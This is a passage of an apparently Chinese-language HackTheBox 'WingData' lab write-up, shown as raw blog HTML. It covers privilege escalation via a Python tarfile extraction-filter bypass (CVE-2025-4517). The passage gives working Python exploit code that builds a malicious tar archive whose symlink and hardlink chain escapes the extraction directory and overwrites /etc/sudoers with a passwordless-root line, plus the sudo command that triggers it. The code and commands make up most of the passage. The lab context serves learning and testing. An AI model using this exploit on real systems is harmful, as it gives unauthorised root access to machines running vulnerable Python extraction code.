tar.addfile(b)</span><br><span class="line">        path = os.path.join(path, comp)</span><br><span class="line">    <span class="comment"># create the final symlink that exceeds PATH_MAX and simply points to the</span></span><br><span class="line">    <span class="comment"># top dir. this allows *any* path to be appended.</span></span><br><span class="line">    <span class="comment"># this link will never be expanded by os.path.realpath(), nor anything after it.</span></span><br><span class="line">    linkpath = os.path.join(<span class="string">&quot;/&quot;</span>.join(steps), <span class="string">&quot;l&quot;</span>*<span class="number">254</span>)</span><br><span class="line">    l = tarfile.TarInfo(linkpath)</span><br><span class="line">    l.<span class="built_in">type</span> = tarfile.SYMTYPE</span><br><span class="line">    l.linkname = (<span class="string">&quot;../&quot;</span> * <span class="built_in">len</span>(steps))</span><br><span class="line">    tar.addfile(l)</span><br><span class="line">    <span class="comment"># make a symlink outside to keep the tar command happy</span></span><br><span class="line">    e = tarfile.TarInfo(<span class="string">&quot;escape&quot;</span>)</span><br><span class="line">    e.<span class="built_in">type</span> = tarfile.SYMTYPE</span><br><span class="line">    e.linkname = linkpath + <span class="string">&quot;/../flag&quot;</span></span><br><span class="line">    tar.addfile(e)</span><br><span class="line">    <span class="comment"># use the symlinks above, that are not checked, to create a hardlink</span></span><br><span class="line">    <span class="comment"># to a file outside of the destination path</span></span><br><span class="line">    f = tarfile.TarInfo(<span class="string">&quot;flaglink&quot;</span>)</span><br><span class="line">    f.<span class="built_in">type</span> = tarfile.LNKTYPE</span><br><span class="line">    f.linkname =  <span class="string">&quot;escape/flag&quot;</span></span><br><span class="line">    tar.addfile(f)</span><br><span class="line">    <span class="comment"># now that we have the hardlink we can overwrite the file</span></span><br><span class="line">    content = <span class="string">b&quot;overwrite\n&quot;</span></span><br><span class="line">    c = tarfile.TarInfo(<span class="string">&quot;flaglink&quot;</span>)</span><br><span class="line">    c.<span class="built_in">type</span> = tarfile.REGTYPE</span><br><span class="line">    c.size = <span class="built_in">len</span>(content)</span><br><span class="line">    tar.addfile(c, fileobj=io.BytesIO(content))</span><br><span class="line">    <span class="comment"># we can also create new files as well!</span></span><br><span class="line">    content = <span class="string">b&quot;new!\n&quot;</span></span><br><span class="line">    n = tarfile.TarInfo(<span class="string">&quot;escape/newfile&quot;</span>)</span><br><span class="line">    n.<span class="built_in">type</span> = tarfile.REGTYPE</span><br><span class="line">    n.size = <span class="built_in">len</span>(content)</span><br><span class="line">    tar.addfile(n, fileobj=io.BytesIO(content))</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771531215687.png" alt="1771531215687"></p>
<p>运行测试代码来解压压缩包提取，成功写入了新文件，原有文件也被重写。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mkdir test</span><br><span class="line">mkdir otherdir</span><br><span class="line">cd otherdir</span><br><span class="line">python3</span><br><span class="line">import tarfile; tarfile.open(&quot;../poc.tar&quot;, &quot;r&quot;).extractall(&quot;/htb/wingdata/test&quot;, filter=&quot;data&quot;)</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771531300018.png" alt="1771531300018"></p>
<hr>
<p>漏洞已经测试，现在需要结合目标机器中的脚本进行利用。</p>
<p>构造恶意压缩包，覆盖&#x2F;etc&#x2F;sudoer文件。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">import tarfile</span><br><span class="line">import os</span><br><span class="line">import io</span><br><span class="line">import sys</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">247 (55 on OSX) picked so the expanded path of <span class="built_in">dirs</span> is 3968 bytes long (or 896</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">on OSX), leaving 128 bytes <span class="keyword">for</span> a prefix and at least a few chars of the <span class="built_in">link</span></span></span><br><span class="line">comp = &#x27;d&#x27; * (55 if sys.platform == &#x27;darwin&#x27; else 247)</span><br><span class="line">steps = &quot;abcdefghijklmnop&quot;</span><br><span class="line">path = &quot;&quot;</span><br><span class="line">with tarfile.open(&quot;/opt/backup_clients/backups/backup_1001.tar&quot;, mode=&quot;x&quot;) as tar:</span><br><span class="line">    # populate the symlinks and dirs that expand in os.path.realpath()</span><br><span class="line">    for i in steps:</span><br><span class="line">        a = tarfile.TarInfo(os.path.join(path, comp))</span><br><span class="line">        a.type = tarfile.DIRTYPE</span><br><span class="line">        tar.addfile(a)</span><br><span class="line">        b = tarfile.TarInfo(os.path.join(path, i))</span><br><span class="line">        b.type = tarfile.SYMTYPE</span><br><span class="line">        b.linkname = comp</span><br><span class="line">        tar.addfile(b)</span><br><span class="line">        path = os.path.join(path, comp)</span><br><span class="line">    # create the final symlink that exceeds PATH_MAX and simply points to the</span><br><span class="line">    # top dir. this allows *any* path to be appended.</span><br><span class="line">    # this link will never be expanded by os.path.realpath(), nor anything after it.</span><br><span class="line">    linkpath = os.path.join(&quot;/&quot;.join(steps), &quot;l&quot;*254)</span><br><span class="line">    l = tarfile.TarInfo(linkpath)</span><br><span class="line">    l.type = tarfile.SYMTYPE</span><br><span class="line">    l.linkname = (&quot;../&quot; * len(steps))</span><br><span class="line">    tar.addfile(l)</span><br><span class="line">    # make a symlink outside to keep the tar command happy</span><br><span class="line">    e = tarfile.TarInfo(&quot;escape&quot;)</span><br><span class="line">    e.type = tarfile.SYMTYPE</span><br><span class="line">    e.linkname = linkpath + &quot;/../../../../../etc&quot;</span><br><span class="line">    tar.addfile(e)</span><br><span class="line">    # use the symlinks above, that are not checked, to create a hardlink</span><br><span class="line">    # to a file outside of the destination path</span><br><span class="line">    f = tarfile.TarInfo(&quot;flaglink&quot;)</span><br><span class="line">    f.type = tarfile.LNKTYPE</span><br><span class="line">    f.linkname =  &quot;escape/sudoers&quot;</span><br><span class="line">    tar.addfile(f)</span><br><span class="line">    # now that we have the hardlink we can overwrite the file</span><br><span class="line">    content = b&quot;wacky ALL=(ALL) NOPASSWD:ALL\n&quot;</span><br><span class="line">    c = tarfile.TarInfo(&quot;flaglink&quot;)</span><br><span class="line">    c.type = tarfile.REGTYPE</span><br><span class="line">    c.size = len(content)</span><br><span class="line">    tar.addfile(c, fileobj=io.BytesIO(content))</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771531967956.png" alt="1771531967956"></p>
<p>将漏洞利用压缩包结合目标脚本进行利用。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1001.tar -r restore_john</span><br></pre></td></tr></table></figure>

<p><img src="/2026/02/19/HackTheBox-WingData/1771532061939.png" alt="1771532061939"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">1.</span> <span class="toc-text">1. 信息搜集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-1-%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-number">1.1.</span> <span class="toc-text">1.1 端口扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-2-Web%E6%9E%9A%E4%B8%BE"><span class="toc-number">1.2.</span> <span class="toc-text">1.2 Web枚举</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%9D%E5%A7%8B%E7%AB%8B%E8%B6%B3"><span class="toc-number">2.</span> <span class="toc-text">2. 初始立足</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-CVE-2025-47812"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 CVE-2025-47812</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">3.</span> <span class="toc-text">3. 横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#3-1-%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3"><span class="toc-number">3.1.</span> <span class="toc-text">3.1 密码破解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">4.</span> <span class="toc-text">4. 权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#4-1-CVE-2025-4517"><span class="toc-number">4.1.</span> <span class="toc-text">4.1 CVE-2025-4517</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/02/19/HackTheBox-WingData/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/02/19/HackTheBox-WingData/&text=HackTheBox WingData"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/02/19/HackTheBox-WingData/&is_video=false&description=HackTheBox WingData"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox WingData&body=Check out this article: http://example.com/2026/02/19/HackTheBox-WingData/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/02/19/HackTheBox-WingData/&title=HackTheBox WingData"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/02/19/HackTheBox-WingData/&name=HackTheBox WingData&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/02/19/HackTheBox-WingData/&t=HackTheBox WingData"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
